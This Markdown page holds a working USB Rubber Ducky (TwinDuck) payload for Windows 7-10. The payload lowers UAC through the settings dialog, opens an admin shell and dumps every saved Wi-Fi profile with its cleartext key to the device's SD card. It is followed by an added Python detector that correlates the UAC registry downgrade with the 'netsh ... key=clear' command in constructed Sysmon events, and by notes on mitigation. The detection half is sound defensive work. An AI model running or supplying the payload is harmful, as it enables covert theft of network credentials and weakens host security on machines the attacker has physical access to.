81 lines
2.3 KiB
Markdown
This payload is designed to retrieve all saved wireless networks and their passwords on a Windows 7-10 machine. I have modified the normal way around bypassing UAC because I found that on some machines, the alert prompt where we would typically say "ALT y" or "LEFTARROW ENTER" is sometimes not the focus of the screen. This method goes right into the UAC settings and lowers it to the minimum.
```
REM --> Auth- eliddell
REM --> for use with TwinDuck on windows 7+
REM --> This duck will take all saved wireless networks and save their info including passwords/keys, to a text file on your duck
DEFAULT_DELAY 75
DELAY 3000
REM --> Minimize all windows
WINDOWS d
DELAY 500
REM run CMD as admin to see network passwords/keys
REM sometimes the admin prompt does not take focus on machines with secure desktop we will force UAC to min
CONTROL ESCAPE
DELAY 300
STRING useraccountcontrolsettings
ENTER
DELAY 300
LEFTARROW
ENTER
DELAY 300
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
TAB
ENTER
DELAY 300
LEFTARROW
ENTER
DELAY 300
CONTROL ESCAPE
DELAY 300
STRING cmd
CTRL-SHIFT ENTER
DELAY 300
REM Change directories because System32 appears to be protected.
STRING CD %TEMP%
ENTER
REM Make batch file that waits for SD card to mount.
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat contents
STRING :while1
ENTER
STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d
ENTER
STRING if Exist %myd% (
ENTER
STRING goto break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto while1
ENTER
STRING :break
ENTER
REM
REM once mounted switch to ducky dir for ease of dumping log to txt
STRING %myd%
ENTER
DELAY 500
REM iterate through all saved wlan profiles and print saved info for each
STRING for /f "tokens=4 delims=: " %%A in ('netsh wlan show profiles') do netsh wlan show profiles name=%%A key=clear >>wlanProfiles.txt
CONTROL z
ENTER
REM run duckywait
STRING DuckyWait.bat
ENTER
DELAY 500
STRING exit
ENTER
WINDOWS d
```
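From the defender's side, the payload leaves two host traces worth alerting on: the UAC slider being dragged to its lowest position, which writes zero to the `ConsentPromptBehaviorAdmin`, `PromptOnSecureDesktop` and `EnableLUA` values under `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System`, and `netsh wlan show profile ... key=clear` being executed shortly afterwards. The following Python detector is an added example, not part of this payload or its author's work. It runs over constructed Sysmon-style events (Event ID 1 process creation and Event ID 13 registry value set, using Sysmon's field names) and correlates the UAC downgrade with the key dump; the sample timestamps, paths and SSID are made up for the demonstration.

```python
"""Added detection example: flag the host traces of a UAC-slider downgrade
followed by a saved Wi-Fi key dump. Input events are constructed,
Sysmon-shaped dicts (EventID 1 = process create, 13 = registry value set)."""
from __future__ import annotations

import re
from datetime import datetime, timedelta

# Values the UAC slider writes; its lowest position sets all three to 0.
UAC_POLICY_KEY = r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
UAC_VALUES = {"ConsentPromptBehaviorAdmin", "PromptOnSecureDesktop", "EnableLUA"}
DWORD_ZERO = re.compile(r"^DWORD \(0x0+\)$")  # Sysmon renders DWORDs like this
# "netsh wlan show profile(s) ... key=clear" prints saved pre-shared keys.
WLAN_KEY_DUMP = re.compile(
    r"\bnetsh\b.*\bwlan\b.*\bshow\b.*\bprofiles?\b.*\bkey=clear\b", re.I)


def _ts(event: dict) -> datetime:
    # Sysmon UtcTime format: "YYYY-MM-DD HH:MM:SS.mmm"
    return datetime.strptime(event["UtcTime"], "%Y-%m-%d %H:%M:%S.%f")


def classify(event: dict) -> str | None:
    """Return a rule name for one event, or None if it is not interesting."""
    if event["EventID"] == 13:
        key, _, value = event["TargetObject"].rpartition("\\")
        if (key.lower() == UAC_POLICY_KEY.lower() and value in UAC_VALUES
                and DWORD_ZERO.match(event.get("Details", ""))):
            return "uac_disabled_via_registry"
    elif event["EventID"] == 1:
        image = event.get("Image", "").lower()
        if image.endswith("\\useraccountcontrolsettings.exe"):
            return "uac_settings_ui_launched"  # the Start-menu path used above
        if WLAN_KEY_DUMP.search(event.get("CommandLine", "")):
            return "wlan_saved_key_dump"
    return None


def detect(events: list[dict], window: timedelta = timedelta(minutes=5)) -> dict:
    """Classify every event, then report a key dump that follows a UAC
    downgrade within `window` as one correlated chain."""
    hits = []
    for event in sorted(events, key=_ts):
        rule = classify(event)
        if rule:
            hits.append((event, rule))
    downgrades = [e for e, r in hits if r == "uac_disabled_via_registry"]
    chains = []
    for event, rule in hits:
        if rule != "wlan_saved_key_dump":
            continue
        for d in downgrades:
            if timedelta(0) <= _ts(event) - _ts(d) <= window:
                chains.append((d["UtcTime"], event["UtcTime"], event["CommandLine"]))
                break
    return {"hits": [(e["UtcTime"], r) for e, r in hits], "chains": chains}


UAC_EXE = r"C:\Windows\System32\UserAccountControlSettings.exe"
NETSH_EXE = r"C:\Windows\System32\netsh.exe"

# Constructed sample telemetry, not captured from a real host.
SAMPLE_EVENTS = [
    {"EventID": 1, "UtcTime": "2024-03-01 10:00:00.000", "Image": UAC_EXE,
     "CommandLine": f'"{UAC_EXE}"'},
    {"EventID": 13, "UtcTime": "2024-03-01 10:00:02.000", "Image": UAC_EXE,
     "TargetObject": UAC_POLICY_KEY + r"\ConsentPromptBehaviorAdmin",
     "Details": "DWORD (0x00000000)"},
    {"EventID": 13, "UtcTime": "2024-03-01 10:00:02.010", "Image": UAC_EXE,
     "TargetObject": UAC_POLICY_KEY + r"\PromptOnSecureDesktop",
     "Details": "DWORD (0x00000000)"},
    {"EventID": 13, "UtcTime": "2024-03-01 10:00:02.020", "Image": UAC_EXE,
     "TargetObject": UAC_POLICY_KEY + r"\EnableLUA",
     "Details": "DWORD (0x00000000)"},
    # Benign: policy restoring the slider to a prompting level (non-zero).
    {"EventID": 13, "UtcTime": "2024-03-01 10:30:00.000",
     "Image": r"C:\Windows\System32\svchost.exe",
     "TargetObject": UAC_POLICY_KEY + r"\ConsentPromptBehaviorAdmin",
     "Details": "DWORD (0x00000002)"},
    {"EventID": 1, "UtcTime": "2024-03-01 10:00:40.000", "Image": NETSH_EXE,
     "CommandLine": "netsh wlan show profiles name=CorpGuest key=clear"},
    # Benign: listing profile names without requesting keys.
    {"EventID": 1, "UtcTime": "2024-03-01 10:05:00.000", "Image": NETSH_EXE,
     "CommandLine": "netsh wlan show profiles"},
]

if __name__ == "__main__":
    result = detect(SAMPLE_EVENTS)
    for when, rule in result["hits"]:
        print(f"{when}  {rule}")
    for start, end, cmd in result["chains"]:
        print(f"CHAIN: UAC downgraded at {start}, keys dumped at {end}: {cmd}")
```

The two benign events (the slider restored to a non-zero level, and a `netsh wlan show profiles` listing without `key=clear`) are deliberately left unflagged so the rules stay narrow. On the mitigation side, the same three registry values are what a GPO or endpoint baseline pins in place; alerting on any write that moves them to zero catches this payload's approach regardless of how the settings dialog was reached.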